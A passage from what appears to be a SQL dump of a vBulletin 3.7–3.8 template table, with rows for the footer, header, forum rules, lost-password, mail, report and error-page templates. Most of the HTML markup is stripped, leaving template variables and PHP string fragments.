    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208875542, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1718, -1, 'footer', '$ad_location[ad_footer_start]\r\n\r\n
    \r\n
    $vbphrase[all_times_are_gmt_x_time_now_is_y]
    \r\n
    \r\n\r\n$spacer_close\r\n\r\n\r\n
    options[\'forumhome\'] . \".php\\\" method=\\\"get\\\" style=\\\"clear:$stylevar[left]\\\">\r\n\r\n\r\n\r\n \".(($show[\'quickchooser\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'languagechooser\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \".(($show[\'contactus\']) ? (\"options[\'contactuslink\'] . \"\\\" rel=\\\"nofollow\\\" accesskey=\\\"9\\\">$vbphrase[contact_us] -\") : (\"\")).\"\r\n \".(($GLOBALS[\'vbulletin\']->options[\'hometitle\']) ? (\"options[\'homeurl\'] . \"\\\">\" . $GLOBALS[\'vbulletin\']->options[\'hometitle\'] . \" -\") : (\"\")).\"\r\n \".(($show[\'admincplink\']) ? (\"session->vars[\'sessionurl_q\'] . \"\\\">$vbphrase[admin] -\") : (\"\")).\"\r\n \".(($show[\'modcplink\']) ? (\"session->vars[\'sessionurl_q\'] . \"\\\">$vbphrase[mod] -\") : (\"\")).\"\r\n \".(($GLOBALS[\'vbulletin\']->options[\'archiveenabled\']) ? (\"$vbphrase[archive] -\") : (\"\")).\"\r\n $template_hook[footer_links]\r\n \".(($GLOBALS[\'vbulletin\']->options[privacyurl]) ? (\"options[\'privacyurl\'] . \"\\\">$vbphrase[privacy_statement] -\") : (\"\")).\"\r\n \".(($GLOBALS[\'vbulletin\']->options[tosurl]) ? (\"options[\'tosurl\'] . \"\\\">$vbphrase[terms_of_service] -\") : (\"\")).\"\r\n $vbphrase[top]\r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n
    \r\n \r\n $vbphrase[powered_by_vbulletin]\r\n \r\n
    \r\n\r\n
    \r\n \r\n $cronimage\r\n \r\n\r\n \" . $GLOBALS[\'vbulletin\']->options[\'copyrighttext\'] . \"\r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$ad_location[ad_footer_end]\r\n\r\n\".(($show[\'dst_correction\']) ? (\"\r\n\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n
    \r\n\r\n\r\n\r\n\") : (\"\")).\"\r\n', '$ad_location[ad_footer_start]\r\n\r\n
    \r\n
    $vbphrase[all_times_are_gmt_x_time_now_is_y]
    \r\n
    \r\n\r\n$spacer_close\r\n\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n
    \r\n \r\n $vbphrase[powered_by_vbulletin]\r\n \r\n
    \r\n\r\n
    \r\n \r\n $cronimage\r\n \r\n\r\n $vboptions[copyrighttext]\r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$ad_location[ad_footer_end]\r\n\r\n\r\n\r\n
    \r\n \r\n \r\n \r\n
    \r\n\r\n\r\n\r\n
    \r\n', 'template', 1238157005, 'vBulletin Solutions', '3.8.2', 'vbulletin'), (1719, -1, 'forumjump', '
    \r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n \r\n $vbphrase[forum_jump]
    \r\n $gobutton\r\n
    \r\n
    ', '
    \r\n
    \r\n \r\n \r\n $vbphrase[forum_jump]
    \r\n $gobutton\r\n
    \r\n
    ', 'template', 1207568337, 'vBulletin Solutions', '3.7.0 Release Candidate 3', 'vbulletin'), (1720, -1, 'forumrules', '\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[posting_rules]\r\n
    \r\n \".((!$show[\'codeonly\']) ? (\"\r\n
    \".(($can[\'postnew\']) ? (\"$vbphrase[you_may_post_new_threads]\") : (\"$vbphrase[you_may_not_post_new_threads]\")).\"
    \r\n
    \".(($can[\'reply\']) ? (\"$vbphrase[you_may_post_replies]\") : (\"$vbphrase[you_may_not_post_replies]\")).\"
    \r\n
    \".(($can[\'attachment\']) ? (\"$vbphrase[you_may_post_attachments]\") : (\"$vbphrase[you_may_not_post_attachments]\")).\"
    \r\n
    \".(($can[\'editpost\']) ? (\"$vbphrase[you_may_edit_your_posts]\") : (\"$vbphrase[you_may_not_edit_your_posts]\")).\"
    \r\n
    \r\n \") : (\"\")).\"\r\n
    \" . construct_phrase(\"$vbphrase[bb_code_is_x]\", \"misc.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=bbcode\", \"$bbcodeon\") . \"
    \r\n
    \" . construct_phrase(\"$vbphrase[smilies_are_x]\", \"misc.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=showsmilies\", \"$smilieson\") . \"
    \r\n
    \" . construct_phrase(\"$vbphrase[img_code_is_x]\", \"misc.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=bbcode#imgcode\", \"$imgcodeon\") . \"
    \r\n
    \" . construct_phrase(\"$vbphrase[html_code_is_x]\", \"$htmlcodeon\") . \"
    \r\n
    \r\n
    \" . construct_phrase(\"$vbphrase[forum_rules_link]\", \"misc.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=showrules\") . \"
    \r\n
    ', '\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n
    \r\n \"\"\r\n $vbphrase[posting_rules]\r\n
    \r\n \r\n
    $vbphrase[you_may_post_new_threads]$vbphrase[you_may_not_post_new_threads]
    \r\n
    $vbphrase[you_may_post_replies]$vbphrase[you_may_not_post_replies]
    \r\n
    $vbphrase[you_may_post_attachments]$vbphrase[you_may_not_post_attachments]
    \r\n
    $vbphrase[you_may_edit_your_posts]$vbphrase[you_may_not_edit_your_posts]
    \r\n
    \r\n
    \r\n
    $vbphrase[bb_code_is_x]
    \r\n
    $vbphrase[smilies_are_x]
    \r\n
    $vbphrase[img_code_is_x]
    \r\n
    $vbphrase[html_code_is_x]
    \r\n
    \r\n
    $vbphrase[forum_rules_link]
    \r\n
    ', 'template', 1220350089, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1721, -1, 'GENERIC_SHELL', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$HTML\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $pagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$HTML\r\n\r\n$footer\r\n\r\n', 'template', 1217841292, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1722, -1, 'gobutton', '', '', 'template', 1094827546, 'vBulletin Solutions', '', 'vbulletin'), (1723, -1, 'header', '\r\n\r\n\r\n\r\n \r\n \r\n\r\n
    options[\'forumhome\'] . \".php\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl_q\'] . \"\\\">\\\"\"options[\'bbtitle\'] . \"\\\" />\r\n \".(($ad_location[\'ad_header_logo\']) ? (\"$ad_location[ad_header_logo]\") : (\" \")).\"\r\n
    \r\n\r\n\r\n\r\n$spacer_open\r\n\r\n$_phpinclude_output\r\n\r\n$ad_location[ad_header_end]', '\r\n\r\n\r\n\r\n \r\n \r\n\r\n
    \"$vboptions[bbtitle]\"\r\n $ad_location[ad_header_logo] \r\n
    \r\n\r\n\r\n\r\n$spacer_open\r\n\r\n$_phpinclude_output\r\n\r\n$ad_location[ad_header_end]', 'template', 1197565670, 'vBulletin Solutions', '3.7.0 Beta 2', 'vbulletin'), (1724, -1, 'headinclude', '\r\noptions[\'templateversion\'] . \"\\\" />\r\n\".(($show[\'threadinfo\']) ? (\"\r\noptions[\'keywords\'] . \"\\\" />\r\n1) ? (\"\" . construct_phrase(\"$vbphrase[page_x]\", \"$pagenumber\") . \"-\") : (\"\")).\"$threadinfo[prefix_plain_html] $threadinfo[title] $foruminfo[title_clean]\\\" />\r\n\") : (\"\".(($show[\'foruminfo\']) ? (\"\r\noptions[\'keywords\'] . \"\\\" />\r\n1) ? (\"\" . construct_phrase(\"$vbphrase[page_x]\", \"$pagenumber\") . \"-\") : (\"\")).\"$foruminfo[description_clean]\\\" />\r\n\") : (\"\r\noptions[\'keywords\'] . \"\\\" />\r\noptions[\'description\'] . \"\\\" />\r\n\")).\"\")).\"\r\n\r\n\r\n$style[css]\r\n\".((is_browser(\'opera\') AND !is_browser(\'opera\', \'8.0.1\')) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\".(($show[\'editor_css\']) ? (\"\r\n$editor_css\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\".(($show[\'popups\']) ? (\"\") : (\"\")).\"\r\n\r\n\".(($GLOBALS[\'vbulletin\']->options[\'externalrss\']) ? (\"\r\n options[\'bbtitle\'] . \" RSS Feed\\\" href=\\\"external.php?type=RSS2\\\" />\r\n \".(($show[\'foruminfo\'] OR $show[\'threadinfo\']) ? (\"\r\n options[\'bbtitle\'] . \" - $foruminfo[title_clean] - RSS Feed\\\" href=\\\"external.php?type=RSS2&forumids=$foruminfo[forumid]\\\" />\r\n \") : (\"\")).\"\r\n\") : (\"\")).\"', '\r\n\r\n\r\n$threadinfo[taglist], $threadinfo[prefix_plain_html] $threadinfo[title], $vboptions[keywords]\" />\r\n1\">$vbphrase[page_x]-
    $threadinfo[prefix_plain_html] $threadinfo[title] $foruminfo[title_clean]\" />\r\n\r\n\r\n1\">$vbphrase[page_x]-$foruminfo[description_clean]\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n$style[css]\r\n\r\n\r\n\r\n\r\n$editor_css\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n', 'template', 1208875321, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1725, -1, 'JOINREQUESTS', '\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n \r\n \".(($show[\'pagenav\']) ? (\"\") : (\"\")).\"\r\n\r\n
    \r\n $vbphrase[requests_to_join_usergroup]:
    \r\n \r\n $gobutton\r\n
    $pagenav
    \r\n\r\n
    \r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\".(($show[\'joinrequests\']) ? (\"\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n$joinrequestbits\r\n\r\n \r\n\r\n\") : (\"\r\n\r\n \r\n\r\n\")).\"\r\n
    \r\n $vbphrase[requests_to_join_usergroup]: $usergroup[title]\r\n
    $vbphrase[username] / $vbphrase[date]$vbphrase[request_reason]
    $vbphrase[there_are_no_outstanding_requests_to_join_this_usergroup]
    \r\n\r\n\".(($show[\'pagenav\']) ? (\"\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n\") : (\"\")).\"\r\n\r\n
    ', '\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n
    \r\n $vbphrase[requests_to_join_usergroup]:
    \r\n \r\n $gobutton\r\n
    $pagenav
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n$joinrequestbits\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n
    \r\n $vbphrase[requests_to_join_usergroup]: $usergroup[title]\r\n
    $vbphrase[username] / $vbphrase[date]$vbphrase[request_reason]
    $vbphrase[there_are_no_outstanding_requests_to_join_this_usergroup]
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n
    \r\n\r\n
    ', 'template', 1208876777, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1726, -1, 'joinrequestsbit', '\r\n \r\n \r\n
    $request[date] $request[time]
    \r\n \r\n $request[reason]\r\n \r\n \r\n \r\n\r\n', '\r\n \r\n \r\n
    $request[date] $request[time]
    \r\n \r\n $request[reason]\r\n \r\n \r\n \r\n\r\n', 'template', 1070058174, 'vBulletin Solutions', '', 'vbulletin'), (1727, -1, 'lightbox', '\r\n\r\n \r\n\r\n
    \r\n
    \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \".(($show[\'newwindow\']) ? (\"\r\n \") : (\"\")).\"\\\"\\\"\r\n
    $attachmentinfo[filename] (\" . construct_phrase(\"$vbphrase[x_of_y]\", \"$current\", \"$total\") . \")$attachmentinfo[date_string] $attachmentinfo[time_string]
    \r\n \r\n \r\n
    \r\n
    ', '\r\n\r\n \r\n\r\n
    \r\n
    \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    width:{$width}px; height:{$height}px\" align=\"center\" valign=\"middle\" id=\"lightboxholder\">\r\n \r\n \"\"\r\n
    $attachmentinfo[filename] ($vbphrase[x_of_y])$attachmentinfo[date_string] $attachmentinfo[time_string]
    \r\n $vbphrase[lightbox_last]$vbphrase[lightbox_previous]\" id=\"lightboxprevbutton$uniqueid\" style=\"padding:4px; background-color:black; color:white; border:solid 1px white; position:relative; top:12px; font-weight:bold; cursor:pointer\" />\r\n $vbphrase[lightbox_first]$vbphrase[lightbox_next]\" id=\"lightboxnextbutton$uniqueid\" style=\"padding:4px; background-color:black; color:white; border:solid 1px white; position:relative; top:12px; font-weight:bold; cursor:pointer\" />\r\n
    \r\n
    ', 'template', 1249925863, 'vBulletin Solutions', '3.8.4', 'vbulletin'), (1728, -1, 'lostpw', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[lost_password_recovery_form]\r\n\r\n\r\n$header\r\n\".(($navbar) ? (\"$navbar\") : (\"

    \")).\"\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[lost_password_recovery_form]
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \".(($human_verify) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
    $vbphrase[forgotten_password_request_email]
    \r\n $vbphrase[email_address]:
    \r\n \r\n
    $human_verify
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[lost_password_recovery_form]\r\n\r\n\r\n$header\r\n$navbar

    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[lost_password_recovery_form]
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[forgotten_password_request_email]
    \r\n $vbphrase[email_address]:
    \r\n \r\n
    $human_verify
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1215529226, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1729, -1, 'mailform', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[send_message]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[send_message]
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \" . construct_phrase(\"$vbphrase[send_message_via_email_to_x_link]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$userid\", \"$destusername\") . \"
    \r\n $vbphrase[email_subject]:
    \r\n \r\n
    \r\n $vbphrase[message]:
    \r\n \r\n
    $vbphrase[using_form_email_available_to_user]
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[send_message]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[send_message]
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[send_message_via_email_to_x_link]
    \r\n $vbphrase[email_subject]:
    \r\n \r\n
    \r\n $vbphrase[message]:
    \r\n \r\n
    $vbphrase[using_form_email_available_to_user]
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208875831, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1730, -1, 'optgroup', '\".(($optgroup_options) ? (\"\r\n\r\n$optgroup_options\r\n\r\n\") : (\"\")).\"', '\r\n\r\n$optgroup_options\r\n\r\n', 'template', 1207568486, 'vBulletin Solutions', '3.7.0 Release Candidate 3', 'vbulletin'), (1731, -1, 'option', '\r\n', '\r\n', 'template', 1069841143, 'vBulletin Solutions', '', 'vbulletin'), (1732, -1, 'reportitem', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $forminfo[reportphrase]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $forminfo[reporttype]: $forminfo[itemname]\r\n $forminfo[reportphrase]\r\n
    \r\n
    \r\n
    \r\n\r\n $usernamecode\r\n\r\n \r\n
    \r\n
    $vbphrase[message]:
    \r\n \r\n
    \r\n \r\n\r\n
    \r\n $forminfo[description]\r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n $forminfo[hiddenfields]\r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $forminfo[reportphrase]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $forminfo[reporttype]: $forminfo[itemname]\r\n $forminfo[reportphrase]\r\n
    \r\n
    \r\n
    \r\n\r\n $usernamecode\r\n\r\n \r\n
    \r\n
    $vbphrase[message]:
    \r\n \r\n
    \r\n \r\n\r\n
    \r\n $forminfo[description]\r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n $forminfo[hiddenfields]\r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208876514, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1733, -1, 'sendtofriend', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[send_page_to_a_friend]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[thread]: $threadinfo[prefix_plain_html] session->vars[\'sessionurl\'] . \"t=$threadid\\\" target=\\\"_blank\\\">$threadinfo[title]\r\n $vbphrase[send_page_to_a_friend]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \".(($human_verify) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $usernamecode
    $human_verify
    \r\n $vbphrase[recipient_name]:
    \r\n \r\n
    \r\n $vbphrase[recipient_email_address]:
    \r\n \r\n
    \r\n $vbphrase[email_subject]:
    \r\n \r\n
    \r\n $vbphrase[message]:
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[send_page_to_a_friend]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[thread]: $threadinfo[prefix_plain_html] $threadinfo[title]\r\n $vbphrase[send_page_to_a_friend]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $usernamecode
    $human_verify
    \r\n $vbphrase[recipient_name]:
    \r\n \r\n
    \r\n $vbphrase[recipient_email_address]:
    \r\n \r\n
    \r\n $vbphrase[email_subject]:
    \r\n $threadinfo[prefix_plain_html] $threadinfo[title]\" size=\"50\" maxlength=\"100\" />\r\n
    \r\n $vbphrase[message]:
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208876471, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1734, -1, 'shell_blank', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$pagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$html\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$pagetitle\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$html\r\n\r\n$footer\r\n\r\n', 'template', 1195729840, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1735, -1, 'spacer_close', '\".(($show[\'old_explorer\']) ? (\"\r\n \r\n\") : (\"\r\n \r\n \r\n\r\n\")).\"\r\n', '\r\n \r\n\r\n \r\n \r\n\r\n\r\n', 'template', 1073266185, 'vBulletin Solutions', '', 'vbulletin'), (1736, -1, 'spacer_open', '\r\n\".(($show[\'old_explorer\']) ? (\"\r\n
    \r\n\") : (\"\r\n
    \r\n
    \r\n
    \r\n\")).\"', '\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \".(($GLOBALS[\'vbulletin\']->options[\'showmoderatorcolumn\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n$childforumbits', '\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n$childforumbits', 'template', 1219054346, 'Hoxxy', '3.7.2', 'vbulletin'), (1779, -1, 'modifyoptions_vbtwitter', '
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n', 'template', 1193831811, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1737, -1, 'STANDARD_ERROR', '$stylevar[htmldoctype]\r\n\r\n\r\n\".(($show[\'search_noindex\']) ? (\"\") : (\"\")).\"\r\n$headinclude\r\n $pagetitle\r\n$headinsert\r\n\r\n\r\n$header\r\n\".(($navbar) ? (\"\r\n$navbar\r\n\") : (\"\r\n


    \r\n\")).\"\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[vbulletin_message]
    \r\n
    \r\n
    \r\n\r\n \".(($show[\'permission_error\']) ? (\"\r\n \r\n
    \r\n \r\n scriptpath . \"\\\" />\r\n \r\n \r\n $postvars\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n \r\n\r\n\r\n
    $vbphrase[not_logged_no_permission]
    \r\n\r\n
      \r\n
    1. $vbphrase[not_logged_in_fill_in_form]
    2. \r\n
    3. $vbphrase[may_not_have_sufficient_privileges]
    4. \r\n
    5. $vbphrase[administrator_may_disabled_account]
    6. \r\n
    \r\n\r\n
    \r\n $vbphrase[log_in]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[username]:
    $vbphrase[password]:
    \r\n session->vars[\'sessionurl\'] . \"do=lostpw\\\">$vbphrase[forgotten_your_password]\r\n \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \" . construct_phrase(\"$vbphrase[admin_required_register]\", \"register.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=signup\") . \"
    \r\n
    \r\n\r\n \r\n \") : (\"\r\n \r\n\r\n\r\n
    $errormessage
    \r\n\r\n\r\n \r\n \")).\"\r\n\r\n
    \r\n
    \r\n \r\n
    \r\n\r\n
    \r\n\r\n\".((!$show[\'enableforumjump\']) ? (\"\r\n\r\n\r\n\r\n \r\n\r\n
    $forumjump
    \r\n\r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n\r\n$headinclude\r\n $pagetitle\r\n$headinsert\r\n\r\n\r\n$header\r\n\r\n$navbar\r\n\r\n


    \r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[vbulletin_message]
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n $postvars\r\n\r\n \r\n \r\n\r\n \r\n\r\n\r\n
    $vbphrase[not_logged_no_permission]
    \r\n\r\n
      \r\n
    1. $vbphrase[not_logged_in_fill_in_form]
    2. \r\n
    3. $vbphrase[may_not_have_sufficient_privileges]
    4. \r\n
    5. $vbphrase[administrator_may_disabled_account]
    6. \r\n
    \r\n\r\n
    \r\n $vbphrase[log_in]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[username]:
    $vbphrase[password]:
    \r\n $vbphrase[forgotten_your_password]\r\n \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    $vbphrase[admin_required_register]
    \r\n
    \r\n\r\n \r\n \r\n \r\n\r\n\r\n
    $errormessage
    \r\n\r\n\r\n \r\n
    \r\n\r\n
    \r\n
    \r\n \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n
    $forumjump
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208876170, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1738, -1, 'STANDARD_ERROR_LITE', '$stylevar[htmldoctype]\r\n\r\n\r\n\r\n$headinclude\r\n$pagetitle\r\n$headinsert\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[vbulletin_message]
    \r\n
    \r\n
    \r\n\r\n \".(($show[\'permission_error\']) ? (\"\r\n \r\n
    \r\n \r\n scriptpath . \"\\\" />\r\n \r\n \r\n $postvars\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n \r\n\r\n\r\n
    $vbphrase[not_logged_no_permission]
    \r\n\r\n
      \r\n
    1. $vbphrase[not_logged_in_fill_in_form]
    2. \r\n
    3. $vbphrase[may_not_have_sufficient_privileges]
    4. \r\n
    5. $vbphrase[administrator_may_disabled_account]
    6. \r\n
    \r\n\r\n
    \r\n $vbphrase[log_in]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[username]:
    $vbphrase[password]:
    \r\n session->vars[\'sessionurl\'] . \"do=lostpw\\\">$vbphrase[forgotten_your_password]\r\n \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \" . construct_phrase(\"$vbphrase[admin_required_register]\", \"register.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=signup\") . \"
    \r\n
    \r\n\r\n \r\n \") : (\"\r\n \r\n\r\n\r\n

    $errormessage

